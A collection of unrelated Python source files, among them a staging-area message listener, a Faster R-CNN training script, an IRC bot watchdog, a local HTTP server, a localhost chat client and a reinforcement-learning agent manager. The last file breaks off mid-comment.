        self.assertDictEqual(local_auth_ctx, ctx['local_auth'])
        self.assertDictEqual(realm_ctx, ctx['realm'])
      return {
          u'exit_code': 1,
          u'hard_timeout': False,
          u'io_timeout': False,
          u'must_signal_internal_failure': None,
          u'version': task_runner.OUT_VERSION,
      }
    self.mock(task_runner, 'run_command', _run_command)
    manifest = get_manifest(command=['a'])
    FakeAuthSystem.local_auth_context = local_auth_ctx
    task_details = get_task_details(realm={'name': 'test:realm'})
    try:
      self.mock(bot_auth, 'AuthSystem', FakeAuthSystem)
      with mock.patch('%s.TaskDetails.load' % task_runner.__name__,
                      mock.Mock(return_value=task_details)):
        actual = load_and_run('http://localhost:1', self.root_dir, manifest,
                              '/path/to/auth-params-file')
    finally:
      FakeAuthSystem.local_auth_context = None
    expected = {
        u'exit_code': 1,
        u'hard_timeout': False,
        u'io_timeout': False,
        u'must_signal_internal_failure': None,
        u'version': task_runner.OUT_VERSION,
    }
    self.assertEqual(expected, actual)
if __name__ == '__main__':
  fix_encoding.fix_encoding()
  # -v enables full assertion diffs and DEBUG-level console logging.
  if '-v' in sys.argv:
    unittest.TestCase.maxDiff = None
  logging_utils.prepare_logging(None)
  logging_utils.set_console_level(logging.DEBUG if '-v' in sys
                                  .argv else logging.CRITICAL + 1)
  # Fix literal text expectation.
  os.environ['LANG'] = 'en_US.UTF-8'
  os.environ['LANGUAGE'] = 'en_US.UTF-8'
  unittest.main()
|
stagingmanager.py | #!/usr/bin/env python
"""
Listens for messages from ingest to create a staging area, post back the credentials for uploading
files to the staging area
"""
from ingest.api.ingestapi import IngestApi
from ingest.api.stagingapi import StagingApi
__author__ = "jupp"
__license__ = "Apache 2.0"
__date__ = "15/09/2017"
import json
import logging
import os
import sys
import threading
import time
from optparse import OptionParser
from listener import Listener
DEFAULT_RABBIT_URL = os.path.expandvars(os.environ.get('RABBIT_URL', 'amqp://localhost:5672'))
class StagingManager:
    """Reacts to ingest messages by creating and deleting upload (staging) areas.

    ``create_upload_area``/``delete_upload_area`` are intended to be used as
    message callbacks: each receives a raw JSON message body containing a
    ``documentId`` that names a submission envelope.
    """

    def __init__(self):
        log_format = ' %(asctime)s - %(name)s - %(levelname)s in %(filename)s:%(lineno)s %(funcName)s(): %(message)s'
        logging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format)
        self.logger = logging.getLogger(__name__)
        self.ingest_api = IngestApi()
        self.staging_api = StagingApi()

    def create_upload_area(self, body):
        """Create an upload area for the submission named in *body* (JSON)
        and patch the resulting credentials back onto the submission envelope.

        Messages without a ``documentId`` key are silently ignored.
        """
        message = json.loads(body)
        if "documentId" in message:
            submission_id = message["documentId"]
            submission_url = self.ingest_api.get_submission_url(submission_id)
            uuid = self.ingest_api.get_object_uuid(submission_url)
            self.logger.info("Creating upload area for submission " + uuid)
            upload_area_credentials = self.staging_api.createStagingArea(uuid)
            self.logger.info(
                "Upload area created! patching creds to subs envelope " + json.dumps(upload_area_credentials))
            self.ingest_api.update_staging_details(submission_url, uuid, upload_area_credentials["uri"])

    def delete_upload_area(self, body):
        """Delete the upload area of the submission named in *body* (JSON),
        then mark the submission as complete.

        Messages without a ``documentId`` key are silently ignored; a missing
        upload area is logged as an error but not raised.
        """
        message = json.loads(body)
        if "documentId" in message:
            submission_id = message["documentId"]
            submission_url = self.ingest_api.get_submission_url(submission_id)
            submission_uuid = self.ingest_api.get_object_uuid(submission_url)
            self.logger.info("Trying to delete the upload area for submission_uuid: " + submission_uuid)
            if self.staging_api.hasStagingArea(submission_uuid):
                self.staging_api.deleteStagingArea(submission_uuid)
                self.logger.info("Upload area deleted!")
                self.set_submission_to_complete(submission_id)
            else:
                self.logger.error("There is no upload area found.")

    def set_submission_to_complete(self, submission_id):
        """Set the submission state to 'complete', retrying up to 4 times.

        BUG FIX: the original loop did not stop after a successful update, so
        the state change was re-sent on every remaining iteration; it also
        gave up silently when all attempts failed. We now return on the first
        success and log an error after exhausting the retries.
        """
        for _ in range(4):  # same attempt count as the original range(1, 5)
            try:
                self.ingest_api.update_submission_state(submission_id, 'complete')
                self.logger.info('Submission status is set to COMPLETE')
                return
            except Exception:
                self.logger.info("failed to set state of submission {0} to Complete, retrying...".format(submission_id))
                time.sleep(1)
        self.logger.error("giving up setting state of submission {0} to Complete".format(submission_id))
if __name__ == '__main__':
    log_format = ' %(asctime)s - %(name)s - %(levelname)s in %(filename)s:%(lineno)s %(funcName)s(): %(message)s'
    logging.basicConfig(stream=sys.stdout, level=logging.INFO, format=log_format)
    # NOTE(review): the parsed options are never used below — both listeners
    # use DEFAULT_RABBIT_URL and hard-coded queue names; confirm before
    # relying on -q/-r/-l.
    parser = OptionParser()
    parser.add_option("-q", "--queue", help="name of the ingest queues to listen for submission")
    parser.add_option("-r", "--rabbit", help="the URL to the Rabbit MQ messaging server")
    parser.add_option("-l", "--log", help="the logging level", default='INFO')
    (options, args) = parser.parse_args()
    staging_manager = StagingManager()
    # Start a listener thread that creates new upload areas.
    create_listener = Listener({
        'rabbit': DEFAULT_RABBIT_URL,
        'on_message_callback': staging_manager.create_upload_area,
        'exchange': 'ingest.upload.area.exchange',
        'exchange_type': 'topic',
        'queue': 'ingest.upload.area.create.queue',
        'routing_key': 'ingest.upload.area.create'
    })
    t = threading.Thread(target=create_listener.run)
    t.start()
    # Start a listener thread that deletes upload areas on cleanup messages.
    delete_listener = Listener({
        'rabbit': DEFAULT_RABBIT_URL,
        'on_message_callback': staging_manager.delete_upload_area,
        'exchange': 'ingest.upload.area.exchange',
        'exchange_type': 'topic',
        'queue': 'ingest.upload.area.cleanup.queue',
        'routing_key': 'ingest.upload.area.cleanup'
    })
    t = threading.Thread(target=delete_listener.run)
    t.start()
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
    """Parse the command-line arguments for alternating-optimization training.

    Prints usage and exits with status 1 when invoked without arguments.
    Returns the populated argparse Namespace.
    """
    parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
    parser.add_argument('--gpu', dest='gpu_id', type=int, default=0,
                        help='GPU device id to use [0]')
    parser.add_argument('--net_name', dest='net_name', type=str, default=None,
                        help='network name (e.g., "ZF")')
    parser.add_argument('--weights', dest='pretrained_model', type=str,
                        default=None,
                        help='initialize with pretrained model weights')
    parser.add_argument('--cfg', dest='cfg_file', type=str, default=None,
                        help='optional config file')
    parser.add_argument('--imdb', dest='imdb_name', type=str,
                        default='voc_2017_trainval',
                        help='dataset to train on')
    parser.add_argument('--set', dest='set_cfgs', default=None,
                        nargs=argparse.REMAINDER,
                        help='set config keys')

    # No arguments at all: show help instead of silently training defaults.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    return parser.parse_args()
def get_roidb(imdb_name, rpn_file=None):
    """Load the imdb named *imdb_name* and build its training roidb.

    If *rpn_file* is given it is recorded on the imdb config so the
    'rpn' proposal method can read pre-computed proposals from disk.
    Returns the (roidb, imdb) pair.
    """
    imdb = get_imdb(imdb_name)
    print 'Loaded dataset `{:s}` for training'.format(imdb.name)
    # Proposal method comes from the (per-stage mutated) global config.
    imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
    print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
    if rpn_file is not None:
        imdb.config['rpn_file'] = rpn_file
    roidb = get_training_roidb(imdb)
    return roidb, imdb
def get_solvers(net_name):
    """Return the per-stage training configuration for *net_name*.

    Returns a 3-tuple:
      solvers            -- four solver prototxt paths (RPN/Fast R-CNN x 2 stages)
      max_iters          -- iteration budget for each of the four stages
      rpn_test_prototxt  -- prototxt used to run the trained RPN at test time
    """
    stage_dir = 'faster_rcnn_alt_opt'
    solver_files = [
        'stage1_rpn_solver60k80k.pt',
        'stage1_fast_rcnn_solver30k40k.pt',
        'stage2_rpn_solver60k80k.pt',
        'stage2_fast_rcnn_solver30k40k.pt',
    ]
    solvers = [os.path.join(cfg.MODELS_DIR, net_name, stage_dir, fname)
               for fname in solver_files]
    # Iterations for each training stage.
    max_iters = [80000, 40000, 80000, 40000]
    # max_iters = [100, 100, 100, 100]
    # Test prototxt for the RPN.
    rpn_test_prototxt = os.path.join(
        cfg.MODELS_DIR, net_name, stage_dir, 'rpn_test.pt')
    return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
    """Initialize pycaffe in a training process.

    Seeds numpy and caffe RNGs from cfg.RNG_SEED for reproducibility and
    selects GPU mode on cfg.GPU_ID. Imported lazily so that only worker
    processes pay the caffe import/initialization cost.
    """
    import caffe
    # fix the random seeds (numpy and caffe) for reproducibility
    np.random.seed(cfg.RNG_SEED)
    caffe.set_random_seed(cfg.RNG_SEED)
    # set up caffe
    caffe.set_mode_gpu()
    caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
              max_iters=None, cfg=None):
    """Train a Region Proposal Network in a separate training process.

    Mutates the passed-in config for RPN training (ground-truth boxes only,
    one image per batch), trains, removes all intermediate snapshots, and
    sends {'model_path': <final snapshot>} back through *queue*.
    """
    # Not using any proposals, just ground-truth boxes
    cfg.TRAIN.HAS_RPN = True
    cfg.TRAIN.BBOX_REG = False  # applies only to Fast R-CNN bbox regression
    cfg.TRAIN.PROPOSAL_METHOD = 'gt'
    cfg.TRAIN.IMS_PER_BATCH = 1
    print 'Init model: {}'.format(init_model)
    print('Using config:')
    pprint.pprint(cfg)

    import caffe
    _init_caffe(cfg)

    roidb, imdb = get_roidb(imdb_name)
    print 'roidb len: {}'.format(len(roidb))
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    rpn_model_path = model_paths[-1]
    # Send final model path through the multiprocessing queue
    queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
                 rpn_test_prototxt=None):
    """Use a trained RPN to generate proposals.

    Runs the RPN at *rpn_model_path* over every image in *imdb_name*, pickles
    the proposals next to the training output, and sends
    {'proposal_path': <pkl path>} back through *queue*.
    """
    cfg.TEST.RPN_PRE_NMS_TOP_N = -1     # no pre NMS filtering
    cfg.TEST.RPN_POST_NMS_TOP_N = 2000  # limit top boxes after NMS
    print 'RPN model: {}'.format(rpn_model_path)
    print('Using config:')
    pprint.pprint(cfg)

    import caffe
    _init_caffe(cfg)

    # NOTE: the matlab implementation computes proposals on flipped images, too.
    # We compute them on the image once and then flip the already computed
    # proposals. This might cause a minor loss in mAP (less proposal jittering).
    imdb = get_imdb(imdb_name)
    print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)

    # Load RPN and configure output directory
    rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Generate proposals on the imdb
    rpn_proposals = imdb_proposals(rpn_net, imdb)
    # Write proposals to disk and send the proposal file path through the
    # multiprocessing queue
    rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
    rpn_proposals_path = os.path.join(
        output_dir, rpn_net_name + '_proposals.pkl')
    with open(rpn_proposals_path, 'wb') as f:
        cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
    print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
    queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
                    max_iters=None, cfg=None, rpn_file=None):
    """Train a Fast R-CNN using proposals generated by an RPN.

    Reads pre-computed proposals from *rpn_file*, trains, removes all
    intermediate snapshots, and sends {'model_path': <final snapshot>}
    back through *queue*.
    """
    cfg.TRAIN.HAS_RPN = False           # not generating prosals on-the-fly
    cfg.TRAIN.PROPOSAL_METHOD = 'rpn'   # use pre-computed RPN proposals instead
    cfg.TRAIN.IMS_PER_BATCH = 2
    print 'Init model: {}'.format(init_model)
    print 'RPN proposals: {}'.format(rpn_file)
    print('Using config:')
    pprint.pprint(cfg)

    import caffe
    _init_caffe(cfg)

    roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Train Fast R-CNN
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    fast_rcnn_model_path = model_paths[-1]
    # Send Fast R-CNN model path over the multiprocessing queue
    queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
    args = parse_args()

    print('Called with args:')
    print(args)

    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id

    # --------------------------------------------------------------------------
    # Pycaffe doesn't reliably free GPU memory when instantiated nets are
    # discarded (e.g. "del net" in Python code). To work around this issue, each
    # training stage is executed in a separate process using
    # multiprocessing.Process.
    # --------------------------------------------------------------------------

    # queue for communicated results between processes
    mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
    solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[0],
        max_iters=max_iters[0],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out = mp_queue.get()
    p.join()

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, generate proposals'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage1_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[1],
        max_iters=max_iters[1],
        cfg=cfg,
        rpn_file=rpn_stage1_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage1_out = mp_queue.get()
    p.join()

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(fast_rcnn_stage1_out['model_path']),
        solver=solvers[2],
        max_iters=max_iters[2],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out = mp_queue.get()
    p.join()

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 RPN, generate proposals'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage2_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()

    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'

    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(rpn_stage2_out['model_path']),
        solver=solvers[3],
        max_iters=max_iters[3],
        cfg=cfg,
        rpn_file=rpn_stage2_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage2_out = mp_queue.get()
    p.join()

    # Create final model (just a copy of the last stage)
    final_path = os.path.join(
        os.path.dirname(fast_rcnn_stage2_out['model_path']),
        args.net_name + '_faster_rcnn_final.caffemodel')
    print 'cp {} -> {}'.format(
        fast_rcnn_stage2_out['model_path'], final_path)
    shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
    print 'Final model: {}'.format(final_path)
|
__init__.py | #!/usr/bin/env python
import sys, os, time, threading, signal
import bot
class Watcher(object):
    # Cf. http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496735
    """Fork-based Ctrl-C watchdog.

    Constructing a Watcher forks the process: the child returns immediately
    and runs the program; the parent blocks in watch() and, on
    KeyboardInterrupt, SIGKILLs the child before exiting.
    """

    def __init__(self):
        self.child = os.fork()
        if self.child != 0:
            # Parent process: just supervise the child.
            self.watch()

    def watch(self):
        """Wait for the child; on Ctrl-C, kill it and exit."""
        try: os.wait()
        except KeyboardInterrupt:
            self.kill()
            sys.exit()

    def kill(self):
        """SIGKILL the child; ignore the race where it already died."""
        try: os.kill(self.child, signal.SIGKILL)
        except OSError: pass
def run_phenny(config):
    """Run the IRC bot forever, reconnecting after disconnects.

    Uses config.delay (seconds) between reconnect attempts, defaulting to 20;
    a non-integer delay disables reconnection (single run).
    """
    if hasattr(config, 'delay'):
        delay = config.delay
    else: delay = 20

    def connect(config):
        # One connection lifetime: returns when the connection drops.
        p = bot.Phenny(config)
        p.run(config.host, config.port)

    # Watcher forks; failure to fork (e.g. unsupported platform) is non-fatal.
    try: Watcher()
    except Exception, e:
        print >> sys.stderr, 'Warning:', e, '(in __init__.py)'

    while True:
        try: connect(config)
        except KeyboardInterrupt:
            sys.exit()

        # Non-integer delay means "do not reconnect".
        if not isinstance(delay, int):
            break

        warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
        print >> sys.stderr, warning
        time.sleep(delay)
def run(config):
    """Entry point: run the bot with *config*.

    NOTE(review): Thread objects always have a 'run' attribute, so the first
    branch always executes run_phenny synchronously on the calling thread and
    t.start() is unreachable. This mirrors upstream phenny — confirm it is
    intentional before changing.
    """
    t = threading.Thread(target=run_phenny, args=(config,))
    if hasattr(t, 'run'):
        t.run()
    else: t.start()
if __name__ == '__main__':
    # Running this package module directly just prints its docstring.
    print __doc__
|
server.py | import sys
import threading
import time
import webbrowser
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class Server:
    """Serve the current directory over HTTP on a daemon thread (Python 2).

    Construction starts the server immediately; openbrowser() opens a URL and
    then blocks until the user types 'q' to shut the server down.
    """

    def __init__(self, port=8000):
        self._initserver(port)

    def openbrowser(self, url):
        """Open *url* in a new browser tab, then block in the quit prompt."""
        webbrowser.open_new_tab(url)
        self.exitserver()

    def exitserver(self):
        """Prompt until the user types q/Q, then shut down and exit."""
        q = str(raw_input('Hit Q to exit server.\n'))
        # BUG FIX: the prompt advertises 'Q' but only lowercase 'q' was
        # accepted; accept either case.
        while q.lower() != 'q':
            q = str(raw_input())
        print ('Shutting down server at port', self.PORT)
        self.httpd.shutdown()
        sys.exit(0)

    def _initserver(self, port):
        """Bind an HTTPServer on localhost:*port* and serve on a daemon thread.

        BUG FIX: the *port* argument was previously ignored and 8000 was
        always used.
        """
        self.PORT = port
        self.httpd = HTTPServer(('localhost', self.PORT), SimpleHTTPRequestHandler)
        print ('Serving at port', self.PORT)
        self.th = threading.Thread(target=self.httpd.serve_forever)
        self.th.daemon = True
        self.th.start()
        # Give the server a moment to come up before the browser hits it.
        time.sleep(5)
import threading
import socket

# Simple TCP chat client: one thread prints incoming messages, the other
# reads stdin and sends. NOTE: connecting happens at import time, so this
# module requires a server on 127.0.0.1:55555 to be running.

# Choosing Nickname
nickname = input("Escolha o seu nickname: ")

# Connecting To Server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 55555))

# Receiving / Listening Function
# Listening to Server and Sending Nickname
def receive():
    """Print server messages forever; reply with the nickname on 'NICK'."""
    while True:
        try:
            # Receive Message From Server
            # If 'NICK' Send Nickname
            message = client.recv(1024).decode('ascii')
            if message == 'NICK':
                client.send(nickname.encode('ascii'))
            else:
                print(message)
        except:
            # Close Connection When Error
            print("Ocorreu um erro!")
            client.close()
            break

# Sending Messages To Server
def write():
    """Read lines from stdin forever and send them prefixed with the nickname."""
    while True:
        message = '{}: {}'.format(nickname, input(''))
        client.send(message.encode('ascii'))

# Starting Threads For Listening And Writing
receive_thread = threading.Thread(target=receive)
receive_thread.start()

write_thread = threading.Thread(target=write)
write_thread.start()
|
agent.py | from __future__ import print_function
import multiprocessing
import os
import portalocker
import time
import traceback
from builtins import object
from builtins import range
from builtins import zip
import envwrap
import numpy as np
import tensorflow as tf
import valuerl
from config import config
import util
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
def run_env(pipe):
    """Environment worker loop for a child process.

    Protocol over *pipe*: on (re)start sends the initial observation, then
    repeatedly receives an action and sends back (obs, reward, done, reset).
    Runs forever; the parent terminates it by killing the process.
    """
    env = envwrap.get_env(config["env"]["name"])
    reset = True
    while True:
        if reset is True: pipe.send(env.reset())
        action = pipe.recv()
        obs, reward, done, reset = env.step(action)
        pipe.send((obs, reward, done, reset))
class AgentManager(object):
    """
    Interact with the environment according to the learned policy,

    Drives a batch of environment worker processes, feeding observations
    through the policy network and collecting (obs, next_obs, action, reward,
    done) frames. In evaluation mode, episode returns are appended to a
    lock-protected CSV.
    """

    def __init__(self, proc_num, evaluation, policy_lock, batch_size, config):
        self.evaluation = evaluation
        self.policy_lock = policy_lock
        self.batch_size = batch_size
        self.config = config

        self.log_path = util.create_directory("%s/%s/%s/%s" % (config["output_root"], config["env"]["name"], config["name"], config["log_path"])) + "/%s" % config["name"]
        self.load_path = util.create_directory("%s/%s/%s/%s" % (config["output_root"], config["env"]["name"], config["name"], config["save_model_path"]))

        ## placeholders for intermediate states (basis for rollout)
        self.obs_loader = tf.placeholder(tf.float32, [self.batch_size, np.prod(self.config["env"]["obs_dims"])])

        ## build model
        self.valuerl = valuerl.ValueRL(self.config["name"], self.config["env"], self.config["policy_config"])
        # Evaluation uses the deterministic/exploit head; training explores.
        self.policy_actions = self.valuerl.build_evalution_graph(self.obs_loader, mode="exploit" if self.evaluation else "explore")

        # interactors: one child process + pipe per batch slot
        self.agent_pipes, self.agent_child_pipes = list(zip(*[multiprocessing.Pipe() for _ in range(self.batch_size)]))
        self.agents = [multiprocessing.Process(target=run_env, args=(self.agent_child_pipes[i],)) for i in range(self.batch_size)]
        for agent in self.agents: agent.start()

        # Each worker sends its initial observation first (see run_env).
        self.obs = [pipe.recv() for pipe in self.agent_pipes]
        self.total_rewards = [0. for _ in self.agent_pipes]
        self.loaded_policy = False

        self.sess = tf.Session()
        self.sess.run(tf.global_variables_initializer())

        self.rollout_i = 0
        self.proc_num = proc_num
        self.epoch = -1
        self.frame_total = 0
        self.hours = 0.
        self.first = True

    def get_action(self, obs):
        """Return a batch of actions for *obs*; random until a policy loads."""
        if self.loaded_policy:
            all_actions = self.sess.run(self.policy_actions, feed_dict={self.obs_loader: obs})
            all_actions = np.clip(all_actions, -1., 1.)
            return all_actions[:self.batch_size]
        else:
            return [self.get_random_action() for _ in range(obs.shape[0])]

    def get_random_action(self, *args, **kwargs):
        # Uniform in [-1, 1) per action dimension.
        return np.random.random(self.config["env"]["action_dim"]) * 2 - 1

    def step(self):
        """Advance every environment one step; return the collected frames."""
        actions = self.get_action(np.stack(self.obs))
        self.first = False
        [pipe.send(action) for pipe, action in zip(self.agent_pipes, actions)]
        next_obs, rewards, dones, resets = list(zip(*[pipe.recv() for pipe in self.agent_pipes]))
        frames = list(zip(self.obs, next_obs, actions, rewards, dones))
        # On reset the worker sends a fresh initial observation (run_env).
        # NOTE(review): `resets[i] is False` is an identity check — assumes the
        # env returns the literal False, not 0/None; confirm against envwrap.
        self.obs = [o if resets[i] is False else self.agent_pipes[i].recv() for i, o in enumerate(next_obs)]

        for i, (t, r, reset) in enumerate(zip(self.total_rewards, rewards, resets)):
            if reset:
                self.total_rewards[i] = 0.
                if self.evaluation and self.loaded_policy:
                    # Append the finished episode's return: hours, epoch, frames, reward.
                    with portalocker.Lock(self.log_path + '.greedy.csv', mode="a") as f: f.write("%2f,%d,%d,%2f\n" % (self.hours, self.epoch, self.frame_total, t + r))
            else:
                self.total_rewards[i] = t + r

        if self.evaluation and np.any(resets): self.reload()

        self.rollout_i += 1
        return frames

    def reload(self):
        """Reload the latest saved policy; return False if no checkpoint yet."""
        if not os.path.exists("%s/%s.params.index" % (self.load_path, self.valuerl.saveid)): return False
        with self.policy_lock:
            self.valuerl.load(self.sess, self.load_path)
            self.epoch, self.frame_total, self.hours = self.sess.run([self.valuerl.epoch_n, self.valuerl.frame_n, self.valuerl.hours])
        self.loaded_policy = True
        self.first = True
        return True
def main(proc_num, evaluation, policy_replay_frame_queue, model_replay_frame_queue, policy_lock, config):
    """Agent process entry point: step environments forever, feeding frames
    into the replay queues (training mode only) and periodically reloading
    the policy. On any exception, joins the worker processes and re-raises.
    """
    try:
        # Per-process seed so parallel agents don't generate identical rollouts.
        np.random.seed((proc_num * int(time.time())) % (2 ** 32 - 1))
        agentmanager = AgentManager(proc_num, evaluation, policy_lock, config["evaluator_config"]["batch_size"] if evaluation else config["agent_config"]["batch_size"], config)
        frame_i = 0
        while True:
            new_frames = agentmanager.step()
            if not evaluation:
                policy_replay_frame_queue.put(new_frames)
                if model_replay_frame_queue is not None: model_replay_frame_queue.put(new_frames)
                if frame_i % config["agent_config"]["reload_every_n"] == 0: agentmanager.reload()
            frame_i += len(new_frames)
    except Exception as e:
        print('Caught exception in agent process %d' % proc_num)
        traceback.print_exc()
        print()
        # Best-effort cleanup; agentmanager may not exist if construction failed.
        try:
            for i in agentmanager.agents: i.join()
        except:
            pass
        raise e
|
Tune_GALDA.py | import numpy as np
from sklearn import feature_extraction
from sklearn.feature_extraction.text import CountVectorizer
from pyevolve import G1DList
from pyevolve import GSimpleGA
from pyevolve import Crossovers
import numpy as np
import os
from gensim import corpora, models, interfaces
import gensim
from itertools import izip
from joblib import Parallel, delayed
import multiprocessing
from multiprocessing import Process, Manager
from threading import Thread
import scipy.spatial
# Module-level setup: read every preprocessed document, build the gensim
# dictionary/corpus and a term-frequency matrix, and initialise the globals
# mutated by eval_func / CalSilhouette2 below.
foldermain = '../Experiments'
foldername = foldermain + '/FILTEREDRM/PREPROCESSED/'
foldermodels = foldermain + '/MODELS/'
clu2orig = {}           # cluster id -> {position-in-cluster: original doc index}
docTopicProbMat = None  # gensim doc->topic distribution, filled per GA evaluation

#COMPUTE BASIC CORPUS AND STUFF
corpus = []
fileList = os.listdir(foldername)
count = 0
corpus = []
texts = []
rc = 0
for f in fileList:
    if (rc % 10 == 0):
        print("Processed ::" + str(rc) + ":: Files ")
    # NOTE(review): the loop variable `f` (filename) is shadowed by the file
